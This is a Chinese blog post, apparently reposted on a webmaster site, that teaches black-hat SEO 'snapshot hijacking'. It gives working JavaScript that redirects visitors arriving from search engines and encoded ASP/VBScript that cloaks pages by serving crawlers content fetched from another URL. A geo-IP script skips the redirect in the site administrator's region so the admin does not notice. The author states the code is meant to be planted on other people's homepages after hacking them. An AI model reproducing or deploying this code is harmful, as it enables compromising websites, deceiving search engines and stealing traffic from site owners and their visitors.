当前位置 博文首页 > 文章内容
最大化 缩小

    谁会做快照劫持 黑帽seo基础手法之快照劫持

    作者:ccxjianye09 栏目:网站安全 时间:2020-11-23 14:20:24

    本站于2023年9月4日。收到“大连君*****咨询有限公司”通知
    说我们IIS7站长博客,有一篇博文用了他们的图片。
    要求我们给他们一张图片6000元。要不然法院告我们

    为避免不必要的麻烦,IIS7站长博客,全站内容图片下架、并积极应诉
    博文内容全部不再显示,请需要相关资讯的站长朋友到必应搜索。谢谢!

    另祝:版权碰瓷诈骗团伙,早日弃暗投明。

    相关新闻:借版权之名、行诈骗之实,周某因犯诈骗罪被判处有期徒刑十一年六个月

    叹!百花齐放的时代,渐行渐远!


         实际上,楼主曾经是搞安全出身的。当然早期也对黑帽手法多少有些了解,最早08年开始,见证了百度一代又一代的黑帽手法,可谓百花齐放,大神大牛级人物层出不穷,但我想黑帽seo,先不谈其性质好坏,单单就技术本身来说也是值得去研究的,何况它的存在推动了搜索引擎的良性发展。
         下午看了三木同学的一篇文章:话说蜘蛛劫持等黑猫seo手法及解决办法。事实上有很多白帽seo对黑帽手法了解的并不多,至于其中的原理可能更是理解的少了,但说到底黑帽seo的倾向于技术性的。所以为了普及一下广大seo,楼主来做一篇基础文章,至于以后会不会出高级操作教程,看情况了。
         首先黑帽包括很多很多手法,技术含量也要求很高。比如举几个列子:流量劫持、快照劫持、泛域名、泛ip、变种ip、目录链轮、新闻源劫持、寄生虫程序、get程序、无限页面链轮等等 ,不止这些,而且还会不停的出新技能。
         这篇文章来解释一下三木同学所遇到的问题吧:
         1.劫持流量:
         三木同学说劫持的时候会判断一下来路引擎,从百度来的时候才会跳转,正常输入网址是打开正常的。好,我们先看一下是怎么实现的,上代码:
    <script LANGUAGE="Javascript">
    var s=document.referrer
    if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 ) 
    location.href="http://www.hao123.com";
    else
    location.href="indax.php/index.asp/index.html"
    </script>

         代码解释:if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 ) 判断搜索引擎来源,如果来源正确,location.href="http://www.hao123.com";跳转到hao123网站。下面的代码是如果否,则打开正常首页。这段代码为js代码。只是一个简单的判断。
         2、快照劫持
         这个是有点技术含量的,需要的代码也不会那么简单,总之目的是把别人网站首页的快照变成自己的,然后别人输入网址打开的时候还是正常显示,判断来路之后才会跳转。想把快照换成自己想要的,得需要一段能改变蜘蛛看法的代码,代码类型很多,我这里写一种:
    <%@ LANGUAGE = VBScript.Encode %><% 
    Dim agent
    agent=Request.ServerVariables("http_user_agent")
    If instr(agent,"Baiduspider") > 0 or instr(agent,"baidubrowser") > 0 or instr(agent,"Sogou") > 0 or instr(agent,"googlebot") > 0 or instr(agent,"Sosospider") > 0 then
    linkurl="http://www.xxx.com" *快照网址
    Function GetBody(Url) 
    Dim objXML
    On Error Resume Next
    Set objXML = CreateObject("Microsoft.XMLHTTP") 
    With objXML 
    .Open "Get", Url, False, "", "" 
    .Send 
    GetBody = .ResponseBody
    End With 
    GetBody=BytesToBstr(GetBody,"GB2312")
    Set objXML = Nothing 
    End Function
    Function BytesToBstr(strBody,CodeBase)
    dim objStream
    set objStream = Server.CreateObject("Adodb.Stream")
    objStream.Type = 1
    objStream.Mode =3
    objStream.Open
    objStream.Write strBody
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = CodeBase
    BytesToBstr = objStream.ReadText 
    objStream.Close
    set objStream = nothing
    End Function
    response.write GetBody(linkurl)
    End if%>
    <script LANGUAGE="Javascript">
    var s=document.referrer
    if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 ) 
    location.href="http://www.baidu.com";
    </script>

         代码解释:前一段判断抓取蜘蛛来源,指向快照抓取网址;后一段代码判断来路,进行跳转到指定网址。这段代码其他地方暂不解释。
         3、判断地区劫持流量
         可能有时候怕管理发现,也不需要其他地区的没用流量。要怎么做呢。比如管理员是江西的,那么看代码:
    <script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js" charset="GB2312" ></script>
    <script type=text/javascript>
    if(remote_ip_info.province ==*江西*){这里指定地区
    ;这里为空表示不跳转 我们留空表示不跳转
    }else{否则
    window.location.href="http://www.hao123.com";如果不是上面地区 就跳转到这个网址
    }
    </script>

         代码解释:http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js 为ip数据识别;其他代码看注释;
         好了,今天就说这几个简单的手法吧,但有人要问了,要怎么实现呢,这些代码要放在什么地方?楼主淡淡的说:要放在别人网站的首页上。既然是劫持,肯定是劫持别人网站的了。那要怎么放进去呢?黑掉。 所以说黑帽是建立在非常高深的技术上面,然后结合seo理论,实现的一种高效转化流量的手段,当然,这里我们暂且不谈黑帽的持久性。
         说实在的,楼主心里犹豫了很久,要不要写这篇文章,因为就好像楼主教大家怎么作弊一样。实际上大家看楼主以前的文章就知道,楼主专注黑帽三十载,这,只是喜欢研究而已。不想为互联网制造垃圾,也不想站长们辛辛苦苦做的站被人黑掉劫持掉。所以等以后有机会了,楼主也许会再发其他类似文章。楼主有时候也想写点心得,顺便征集大家的需求,比如:网站安全、防黑,当然白帽seo楼主也可以解答。:)